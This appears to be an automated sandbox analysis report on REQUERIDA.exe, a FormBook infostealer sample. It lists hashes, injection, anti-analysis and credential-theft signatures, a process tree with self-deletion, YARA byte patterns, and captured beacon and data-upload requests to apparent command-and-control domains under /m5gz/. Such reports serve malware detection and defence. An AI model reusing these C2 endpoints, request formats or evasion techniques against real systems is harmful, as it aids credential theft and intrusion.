
Analysis Report REQUERIDA.exe

Overview

General Information

Sample Name: REQUERIDA.exe
Analysis ID: 255317
MD5: e07d5b6d29e7cae1ea8546b4783601b8
SHA1: d5c823bdee28ccf2bd18e683eca270d6c031cb72
SHA256: 3ec51daa2ad133cfcdce1ffca7081f96ee58d9b5c2d302cee732e6e2cc3d8cc6


Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Benign windows process drops PE files
Detected FormBook malware
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • REQUERIDA.exe (PID: 6216 cmdline: 'C:\Users\user\Desktop\REQUERIDA.exe' MD5: E07D5B6D29E7CAE1EA8546B4783601B8)
    • REQUERIDA.exe (PID: 6312 cmdline: C:\Users\user\Desktop\REQUERIDA.exe MD5: E07D5B6D29E7CAE1EA8546B4783601B8)
      • explorer.exe (PID: 3420 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 6780 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • cmd.exe (PID: 6444 cmdline: /c del 'C:\Users\user\Desktop\REQUERIDA.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • user7n7plnxh.exe (PID: 644 cmdline: C:\Program Files (x86)\Au2k\user7n7plnxh.exe MD5: E07D5B6D29E7CAE1EA8546B4783601B8)
          • user7n7plnxh.exe (PID: 5668 cmdline: C:\Program Files (x86)\Au2k\user7n7plnxh.exe MD5: E07D5B6D29E7CAE1EA8546B4783601B8)
        • user7n7plnxh.exe (PID: 5484 cmdline: 'C:\Program Files (x86)\Au2k\user7n7plnxh.exe' MD5: E07D5B6D29E7CAE1EA8546B4783601B8)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings (listed under each row)
00000001.00000002.1330781052.00000000010A0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000002.1330781052.00000000010A0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b22:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x157a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15291:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x158a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x15a1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa69a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1450c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb393:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.1330781052.00000000010A0000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18429:$sqlite3step: 68 34 1C 7B E1
  • 0x1853c:$sqlite3step: 68 34 1C 7B E1
  • 0x18458:$sqlite3text: 68 38 2A 90 C5
  • 0x1857d:$sqlite3text: 68 38 2A 90 C5
  • 0x1846b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18593:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.1543213896.00000000032C0000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000006.00000002.1543213896.00000000032C0000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b22:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x157a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15291:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x158a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x15a1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa69a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1450c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb393:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings (listed under each row)
1.2.REQUERIDA.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.REQUERIDA.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8ab8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d22:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x149a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14491:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14aa7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14c1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x989a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1370c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa593:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19d17:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ad1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.REQUERIDA.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x17629:$sqlite3step: 68 34 1C 7B E1
  • 0x1773c:$sqlite3step: 68 34 1C 7B E1
  • 0x17658:$sqlite3text: 68 38 2A 90 C5
  • 0x1777d:$sqlite3text: 68 38 2A 90 C5
  • 0x1766b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x17793:$sqlite3blob: 68 53 D8 7F 8C
1.2.REQUERIDA.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.REQUERIDA.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b22:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x157a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15291:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x158a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x15a1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa69a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1450c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb393:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Signature Overview


AV Detection:

Yara detected FormBook
Source: Yara match | File source: 00000001.00000002.1330781052.00000000010A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.1543213896.00000000032C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.1539075288.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000002.1537258723.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.1542910573.0000000003290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1330562113.0000000000C60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1280189026.0000000004A67000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1330269509.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000002.1539944232.00000000013E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.1540880092.00000000049B3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 1.2.REQUERIDA.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.REQUERIDA.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.user7n7plnxh.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.user7n7plnxh.exe.400000.0.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Au2k\user7n7plnxh.exe | Joe Sandbox ML: detected
Machine Learning detection for sample
Source: REQUERIDA.exe | Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 6_2_009EB89C GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose, 6_2_009EB89C
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 6_2_009F68BA FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose, 6_2_009F68BA
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 6_2_009F245C FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove, 6_2_009F245C
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 6_2_009E85EA memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 6_2_009E85EA
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 6_2_00A031DC FindFirstFileW,FindNextFileW,FindClose, 6_2_00A031DC
Source: C:\Users\user\Desktop\REQUERIDA.exe | Code function: 4x nop then mov ecx, dword ptr [ebp-38h] 0_2_0579946F
Source: C:\Users\user\Desktop\REQUERIDA.exe | Code function: 4x nop then mov ecx, dword ptr [ebp-38h] 0_2_057963BC
Source: global traffic | HTTP traffic detected:
  GET /m5gz/?_XL000=kjyTHG7M5+o/Kq+xwhbVXGcr7fjqvHhbYflT6qoyig2y0FYlKC4jWFLbARP9Es016vDL&DzuD=WBjPZrc0f HTTP/1.1
  Host: www.wrn23internetradio.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic | HTTP traffic detected:
  GET /m5gz/?_XL000=N1QJ5f5PgoHrxTkIrgSXDO6cNiqUEFPDvQ7hq5VcmSYef3bomSQTX9iB3mXU+tFBt4fC&DzuD=WBjPZrc0f HTTP/1.1
  Host: www.emarketschool.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic | HTTP traffic detected:
  POST /m5gz/ HTTP/1.1
  Host: www.emarketschool.com
  Connection: close
  Content-Length: 412
  Cache-Control: no-cache
  Origin: http://www.emarketschool.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.emarketschool.com/m5gz/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
Source: global traffic | HTTP traffic detected:
  POST /m5gz/ HTTP/1.1
  Host: www.emarketschool.com
  Connection: close
  Content-Length: 182716
  Cache-Control: no-cache
  Origin: http://www.emarketschool.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.emarketschool.com/m5gz/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: unknown | DNS traffic detected: queries for: g.msn.com
Source: unknown | HTTP traffic detected:
  POST /m5gz/ HTTP/1.1
  Host: www.emarketschool.com
  Connection: close
  Content-Length: 412
  Cache-Control: no-cache
  Origin: http://www.emarketschool.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.emarketschool.com/m5gz/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
Source: explorer.exe, 00000002.00000000.1309848471.0000000012B70000.00000002.00000001.sdmp | String found in binary or memory: http://%s.com
Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000002.00000000.1309848471.0000000012B70000.00000002.00000001.sdmp | String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: explorer.exe, 00000002.00000000.1296158118.0000000007EC1000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000002.00000000.1306201883.0000000011076000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://home.altervista.org/favicon.ico
Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmp | String found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot
Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmp | String found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot?#iefix
Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmp | String found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otf
Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmp | String found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-b
Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmp | String found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttf
Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmp | String found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff
Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmp | String found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff2
Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmp | String found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot
Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmp | String found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot?#iefix
Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmp | String found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.otf
Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmp | String found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.svg#ubuntu-r
Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmp | String found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.ttf
Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmp | String found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff
Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmp | String found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff2
Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmp | String found in binary or memory: http://i1.cdn-image.com/__media__/js/min.js?v2.2
Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/arrow.png)
Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/bodybg.png)
Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/kwbg.jpg)
Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/logo.png)
Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/pics/12471/libg.png)
Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/pics/12471/libgh.png)
Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/pics/12471/search-icon.png)
Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://ie.search.yahoo.com/os?command=
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
